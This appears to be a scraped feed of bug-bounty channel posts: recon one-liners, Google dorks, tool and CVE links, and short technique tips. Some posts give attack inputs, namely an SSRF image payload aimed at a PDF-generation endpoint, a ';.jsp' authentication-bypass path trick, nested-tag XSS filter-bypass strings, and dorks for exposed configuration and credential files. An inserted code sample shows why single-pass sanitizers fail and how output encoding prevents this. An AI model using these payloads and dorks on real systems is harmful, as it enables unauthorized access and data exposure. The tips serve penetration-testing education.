🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
🚨CVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite
⚡Dorks
HUNTER : product.name="DotNetNuke"
Extract all endpoints from a JS File and take your bug 🐞
- Method one
`waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '/' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['|\\\"](https?:)?[/]{1,2}[^'||\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['|\\\"](https?:)?[/]{1,2}[^'||\\\"> ]{5,})\"" | awk -F "['|\"]" '{print $2}' | sort -fu`
- Method two
`` cat JS.txt | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u | tee endpoints.txt ``
#infosec #cybersec #bugbountytips
☄️JSRecon-Buddy - A simple browser extension to quickly find interesting security-related information on a webpage.
🔴https://github.com/TheArqsz/JSRecon-Buddy
Black Hat USA 2025 Slides and files
Conference presentation slides
🔼GitHub
🔼InfoCon
❤ Share & Support & Reaction Us
🧩 #event
Hey Hunter's,
DarkShadow here back again!
SSRF in pdf generation!
This API endpoint sends the PDF generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src=‘burp collab url’ />
It comes back 200 OK and the request hits Burp Collaborator.
You can follow me in my x.com/darkshadow2bd
#ssrf #bugbountytips
☄️ Cheapest VPS for Bug Bounty & Pentesting
⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3
☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
✨ https://github.com/jonaslejon/malicious-pdf
#exploit
#AppSec
#Threat_Research
1⃣ Zimbra Exploit Analysis (CVE-2025-27915)
https://strikeready.com/blog/0day-ics-attack-in-the-wild
// These exploits take advantage of .ics files to breach vulnerable systems
2⃣ Notepad++ DLL Hijacking (CVE-2025-56383)
https://github.com/zer0t0/CVE-2025-56383-Proof-of-Concept
// If the threat actor has the ability to replace an application's DLL, they would have the ability to put malware directly in the same location...
3⃣ Lenovo Display Control Center - A simple ACL Exploit (CVE-2024-2175)
https://neodyme.io/de/blog/lenovo_dcc_lpe_logic
// Two operating methods are presented for achieving local administrative access: a race condition-based approach and a junction path exploitation technique
🔥FRESH BB TARGET - https://visioninstitutecolorado.com/.well-known/security.txt
I request a small support in boosting my channel, which will help me to be more consistent and more active...
/channel/boost/bugbounty_tech
Based on the poll, I have understood that the members of the group are looking for AI content too. Thanks for all the responses; I will make a plan for what content should be added here and what should not.
↳ Pentest References and CheatSheets
• Hacking Articles
• Hack Tricks
• Cloud Hack Tricks
• Chryzsh Pentest Book
• Total OSCP Guide
• Hack The Box OSCP Preparation
• Steflan Security
• SecWiki
• Hausec
• HighOnCoffee
• six2dez pentest-book
• 0xffsec Handbook
• haax's Cheatsheet
• golinuxcloud
• Pentest Monkey
• Web App Testing Guide
• XSS CheatSheet
• Payload Box
• Steganography Tools
• Metasploit Unleashed
• Payloads All The Things
• Mobile Security Testing Guide
• WADComs
• LOLBAS
• explainshell
#infosec #cybersecurity #bugbounty #pentest #cheatsheet
A library of tools for vibe coding
https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools
https://zhero-web-sec.github.io/writeups/
https://samcurry.net/
https://shubs.io/
https://dhiyaneshgeek.github.io/
https://bhavukjain.com/
https://rhynorater.github.io/
https://m0chan.github.io/
https://spaceraccoon.dev/
https://ott3rly.com/
https://www.jhaddix.com/blog
https://hackerrishad.me/
Hey Hunter's,
Darkshadow here back again!
✨Authentication bypass method:
✅Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]
2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Payload 👉🏼 ;.jsp
Hey Hunters,
DarkShadow here back again, dropping an interesting XSS input sanitization bypass method.
You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really 😅
Okay, so first, have a look at some example tags that could trigger XSS:
script, img, a, iframe, object, video, audio, form, meta
<script>alert(1)</script>
alert(1)
<script <img>> alert(1) </script </img>>
<script <img>>
<script <img>> → remove <img> → <script>
</script </img>> → remove </img> → </script>
<script>alert(1)</script>
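Why a single removal pass leaves a working tag behind, as an added example that is not part of the original post. The function names and the blocklist are hypothetical; the input string is the nested payload quoted above, and the comparison ends with the output-encoding approach that does not depend on a blocklist.

```javascript
// Hypothetical blocklist filter: matches bare <tag> and </tag> forms only.
const BLOCKED_TAG = /<\/?(?:script|img|iframe)\s*>/gi;

// Weak: one global replace. The regex engine never rescans text that
// is created when the removed pieces are joined back together.
function stripOnce(input) {
  return input.replace(BLOCKED_TAG, "");
}

// Better: repeat until nothing changes (fixed point). Still a blocklist,
// so it stays incomplete for anything the pattern does not describe.
function stripUntilStable(input) {
  let previous;
  let current = input;
  do {
    previous = current;
    current = current.replace(BLOCKED_TAG, "");
  } while (current !== previous);
  return current;
}

// Robust: encode on output so the browser never parses user data as markup.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Constructed sample: the nested payload from the post.
const PAYLOAD = "<script <img>> alert(1) </script </img>>";

function demo() {
  return {
    once: stripOnce(PAYLOAD),          // tag is reassembled
    stable: stripUntilStable(PAYLOAD), // tag is gone, text remains
    escaped: escapeHtml(PAYLOAD),      // rendered as inert text
  };
}

console.log(demo());
```
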
JSMap Inspector - A powerful, offline, single-file HTML tool designed for developers and security researchers to inspect and analyze JavaScript Source Map (.js.map) files.
https://github.com/ynsmroztas/JSMap-Inspector
🌀Download all bug bounty programs domains in scope items 🎯
😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥
👇🏼Step 1: Download the domains.txt file
📂step 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
📂Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions❤️
🔥Oneliner to download ALL of @assetnote's wordlists:
⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off
Google Dork - XSS Prone Parameters 🔥
site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&
🔥Google Dork - Exposed Configs 🔍
site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
©TakSec
https://x.com/livingdevops/status/1974105605431349682?t=zhTSA-5rSrgr27dqGo-QSw&s=35
🔥BB TARGET - https://www.lockheedmartin.com/en-us/contact/vulnerability-disclosure-policy.html
Johnermac
>eJPT
>eCPPTv2
>PNPT
>eWPTXv2
>Active Directory Exploitation
>CRTP
>CRTE
>CLOUD
>CONTAINER
Link 🔗:-
https://johnermac.github.io/
#Tech_book
#Sec_code_review
"Node.js Secure Coding:
Defending Against Command Injection Vulnerabilities",
July 2023.
// Learn about secure coding practices with Node.js based on real-world CVE vulnerabilities in popular open-source npm packages: 12 Vulnerable npm Packages, 33 Self-assessment Questions, 10 Chapters
Automating API Vulnerability Testing Using Postman Workflows
https://haymiz.dev//security/2024/04/27/automating-apis-with-postman-workflows/
⚡Sn1per - Automate your recon like never before!
✅ https://github.com/1N3/Sn1per
Bypass SQL union select